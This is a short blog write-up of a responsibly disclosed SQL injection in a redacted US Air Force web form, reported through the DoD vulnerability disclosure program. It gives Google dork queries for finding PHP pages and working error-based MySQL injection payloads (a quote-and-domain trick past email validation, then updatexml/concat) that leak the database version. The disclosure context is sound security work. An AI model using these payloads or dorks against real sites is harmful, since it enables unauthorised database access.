CDL Logo
Published on

A Simple SQL Injection in an Air Force Website

302 words2 min read
Authors

Information is key. What sort of information could be in an Air Force Database?

Who would get hurt by that data? Who would it benefit?

In 2017, 17-year-old me easily gained access to an Air Force database.

Back then, I practiced in the DoD's Vulnerability Disclosure Program (VDP). I was looking at the Airforce subdomains and I decided to look for sites running PHP.

To do this, I used Google. If you use Google, you should know about Google Dorks. (If you don't, look them up!)

I looked up: site:*.af.mil + ext:php and site:.af.mil + filetype:php

I got a ton of results and I visited one:

https://███.af.mil/php/███/███.php

It was a form that asked for an email. So, I entered an email and submitted the form:

https://███.af.mil/php/███/███.php?email=myemail@example.com

I decided to try SQL Injection. The application is likely saving my email to a database.

So, I tried the following: https://███.af.mil/php/███/███.php?email='

The application responded with an error message that the email address was invalid.

So, I tried the following: https://███.af.mil/php/███/███.php?email='@hackerone.mil

This time I got an SQL error!

You have an error in your SQL syntax

Sweet! It's MySQL! This application showed database error messages. Knowing this, I wanted to gain info through triggering error messages. Through MySQL's XML Functions.

The UpdateXML() function replaces an XML fragment and returns it.

UpdateXML('xml', 'xpath_expression', 'new replacement')

If the function is given an invalid XPath expression, it throws an error.

So, I came up with the following:

https://███.af.mil/php/███/███.php?email=' and updatexml(null,concat(0x0a,version()),null)-- -@hackerone.mil

XPATH syntax error: ':5.6.24-log'

I stopped here and I reported it to the Department of Defense's vulnerability disclosure program on HackerOne.

You can see the redacted report here: https://hackerone.com/reports/277380